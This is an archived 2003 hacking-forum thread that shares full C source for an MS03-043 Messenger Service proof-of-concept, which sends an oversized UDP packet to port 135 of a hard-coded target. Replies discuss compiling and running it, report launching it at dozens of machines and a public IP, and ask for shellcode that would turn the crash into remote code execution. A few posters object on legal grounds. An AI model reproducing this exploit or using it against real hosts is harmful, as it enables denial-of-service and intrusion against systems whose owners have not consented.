Code For Ms03-043

GovernmentSecurity.org > The Archives > Public Downloads

kyprizel

Oct 27 2003, 07:49 AM

men, just look at

memset(body,0x14,sizeof(body));

in code
and look at the exploit's header....

jsands

Oct 19 2003, 05:57 AM

*/

#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>

// Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length

int main(int argc,char *argv[])
{
int i, packet_size, fields_size, s;
unsigned char packet[8192];
struct sockaddr_in addr;
// A few conditions :
// 0 <= strlen(from) + strlen(machine) <= 56
// max fields size 3992
char from[] = "RECCA";
char machine[] = "ZEUS";
char body[4096] = "*** MESSAGE ***";

WSADATA wsaData;

WSAStartup(0x0202, &wsaData);

ZeroMemory(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("192.168.186.3");
addr.sin_port = htons(135);

ZeroMemory(packet, sizeof(packet));
packet_size = 0;

memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1;

i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
memset(body, 0x14, sizeof(body));
body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i;

fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size;

fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size);

/*
for (i = 0; i < packet_size; i++)
{
if (i && ((i & 1) == 0))
fprintf(stdout, " ");
if (i && ((i & 15) == 0))
fprintf(stdout, "\n");
fprintf(stdout, "%02x", packet[i]);
}
fprintf(stdout, "\n");
*/
if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
exit(EXIT_FAILURE);

if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1)
exit(EXIT_FAILURE);
/*
if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
exit(EXIT_FAILURE);
*/

exit(EXIT_SUCCESS);
}

jsands

Oct 19 2003, 05:59 AM

pretty sure this is the code, if someone could, compile and exe for me, i'm too lazy.

z0mbi3

Oct 19 2003, 08:10 AM

using visual c++

FxF

Oct 19 2003, 08:31 AM

how is the command for msg.exe? and is it for the new messenger hole an exploit?

thx

FxF

xaph

Oct 19 2003, 08:34 AM

QUOTE (yamaraj @ Oct 19 2003, 08:10 AM)

using visual c++

hmmm why is your exe 1xx kb big? infected with trojan?! Myone is just 30 kb....

Steve2017

Oct 19 2003, 08:40 AM

Thanx 4 sharing, but how 2 use it?

ducky

Oct 19 2003, 08:51 AM

Thanks for the exploits...just one qiestion...it's the mesenger vuln. exploit??

elBartalo

Oct 19 2003, 08:56 AM

I dont understand the exploit...
what the command for this exploit?
How to scan this bug? Portscan 135 and 139? because its Microsoft Messanger Service...

mon

Oct 19 2003, 09:01 AM

Actually is the Denial of Service code
http://www.security-corporation.com/downlo...t/ms03-043poc.c

thatsmej

Oct 19 2003, 10:32 AM

QUOTE (elBartalo @ Oct 19 2003, 08:56 AM)

I dont understand the exploit...
what the command for this exploit?
How to scan this bug? Portscan 135 and 139? because its Microsoft Messanger Service...

you find a scanner in the file downloads section.

there is no command for this code,
cause the ip is build in the exe.

unless the guy changed the code to work ( like me )

Flinston

Oct 19 2003, 10:42 AM

It's just a DOS, not the code execution, isn't it ? o.O

jsands

Oct 19 2003, 10:52 AM

The Code is the overflow which gives you LocalSystem, but yes also a dos, should reboot the computer, or that's what I read.

Flinston

Oct 19 2003, 11:00 AM

in the ms bulletin was a possible code execution mentioned ... is this possible with this code !?

ScriptGod

Oct 19 2003, 11:08 AM

it uses the MS03-043 bug! but doens't execute a code. it only kills the process with this bug. and the system restarts like the DoS attack with the rpc bug

but you need to compile it by your own because there is an attack address in the code you cannot change this address with a parameter

thatsmej

Oct 19 2003, 11:42 AM

QUOTE (ScriptGod @ Oct 19 2003, 11:08 AM)

oke,
you forced me ..

it`s 160 kb,
cause i only build the debug and not the release ( to lazy )

command:
MS03_043_poc ip

jezus,
no exe/ no rar / zip is allowed?

element

Oct 19 2003, 11:59 AM

How use?????

Anarchy

Oct 19 2003, 12:37 PM

i scaned lots servers with ms03-043 by Retina MSGSVC.exe
i tested the exp.exe
ms03_043_cop.exe Remote ip
but nothing happend
the server is alive,and nothing happened on it

z0mbi3

Oct 19 2003, 02:29 PM

QUOTE (xaph @ Oct 19 2003, 08:34 AM)

QUOTE (yamaraj @ Oct 19 2003, 08:10 AM)

using visual c++

hmmm why is your exe 1xx kb big? infected with trojan?! Myone is just 30 kb....

hey dude dunno about any trojan just copied the code,onto visual c++ then compiled it then uploaded the file from debug folder.

check the file before you use it if you don't believe....

c ya

ScriptGod

Oct 19 2003, 02:55 PM

QUOTE (Anarchy @ Oct 19 2003, 12:37 PM)

i scaned lots servers with ms03-043 by Retina MSGSVC.exe
i tested the exp.exe
ms03_043_cop.exe Remote ip
but nothing happend
the server is alive,and nothing happened on it

hmm, i haven't test it against xp. it's possible that works only against win2k

QUOTE

[...]
Tested against a Win2K SP4.
[...]

T3cHn0b0y

Oct 19 2003, 08:00 PM

Flinston is right...

Impact of Vulnerability: Remote Code Execution

Microsoft Security Bulletin - MS03-043

Can anyone incorporate some shellcode into the exploit? Im sure it'll only be a few days until it does come out.

I also tried the DoS attack...it works fine for me although I see no purpose for it apart from shitting on someone you dont like.

Venom

Oct 19 2003, 08:12 PM

jsands please read the rules no compiling requests

jetprice

Oct 19 2003, 09:36 PM

if you want to implement a shellcode yourself you have to know how the code itself works... where is the EIP, how big is the buffer and stuff like that ... it is not done in 2secs

...

If you want to know more about this stuff i suggest first learning c then reading some articles on basic buffer overflows going on to string buffer overflows and so on ... something that you do in 1year ( then you are good )

My point for those who don't know how it works or start learning or wait for the remote code execution source to come out

SLiM577

Oct 19 2003, 11:44 PM

yea i tested this on about 25 or so win2k boxes my self nothing happened box didnt reboot or anything =/

ComSec

Oct 20 2003, 09:14 AM

QUOTE (jsands @ Oct 20 2003, 01:44 AM)

Sorry Venom, didn't really mean to request, i'm just lazy.

read the rules jsands...a good job were not lazy.... warn points added

jsands

Oct 20 2003, 01:44 AM

Sorry Venom, didn't really mean to request, i'm just lazy.

ScriptGod

Oct 20 2003, 07:00 AM

QUOTE (SLiM577 @ Oct 19 2003, 11:44 PM)

yea i tested this on about 25 or so win2k boxes my self nothing happened box didnt reboot or anything =/

are you crazy? to post such a thing in a public forum? I hope you had the allowance to do that...

to the topic... i have compiled my version:
usage: MS03_043.exe TargetIP

VincentVega

Oct 20 2003, 07:23 AM

Will this give a remote shell ScriptGod?

I will test it, thanks for sharing

Susboy

Oct 20 2003, 07:32 AM

nope still no luck. Tried all of the exe's. ((201.46.142.186 UNPATCHED (1026))

D:\Tools>MS03_043.exe
usage: MS03_043.exe <TargetIP>

D:\Tools>MS03_043.exe 201.46.142.186
Max 'body' size (incl. terminal NULL char) = 3940
Total length of strings = 3948
Packet size = 4072
Fields size = 3992

D:\Tools>

did nothing

jsands

Oct 20 2003, 08:04 AM

found a new code for this stupid shit, doubt it will work either though, wouldn't surprise me, shit already makes me feel like some type of lame ass, as it is.

ScriptGod

Oct 20 2003, 08:06 AM

no this will only do a DoS attack on the victim. this is just the exploits with a parameter to set the target... it's not easy to add such a shell.

well it works at my local unpatched win2k system. try to use 2 or 3 times. then the machine should restart after 120 seconds. but i haven't tested it on other systems. it's possible that this one will only work on win2k systems

ScriptGod

Oct 20 2003, 08:09 AM

QUOTE (jsands @ Oct 20 2003, 08:04 AM)

found a new code for this stupid shit, doubt it will work either though, wouldn't surprise me, shit already makes me feel like some type of lame ass, as it is.

this seems to bee the same exploits - only ported to linux and added command line switches

jetprice

Oct 22 2003, 01:14 PM

QUOTE (ComSec @ Oct 20 2003, 09:14 AM)

QUOTE (jsands @ Oct 20 2003, 01:44 AM)

Sorry Venom, didn't really mean to request, i'm just lazy.

read the rules jsands...a good job were not lazy.... warn points added

I agree witht you on this one, personally i think people who are lazy do not belong on this board, they are here for the wrong reasons ( download exploits and hack other networks instead of their own networks )!

Hacking is illegal people ... and for the lazy people i really do hope the cops pass by to get your arse jailed. If you feel offended by this so be it, I think this board is a really good source for sysops, i really feel sorry to read all those kiddie replies, some don't even respect people if they filled their requests, wtf is wrong with you ??? Even worse, some don't even know the basic msdos / linux commands!

So now that i was able to get this out I hope some people will notice this and hopefully think it over before replying with "y0 y0u s1c|< b4st4rd, y0u ju57 41n7 1337 3n0ugh f0r 7h15 pl4c3!" as you can see its not hard to write your stupid slang.

greets to people who use this site for good purposes and not for illegal activities like the fxp scene - ( hello i know you are here )

PS: admins, i don't mind if you delete my reply because of some content that is not allowed... i just think these people (filtered) up your board with dumb and ungrounded replies.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.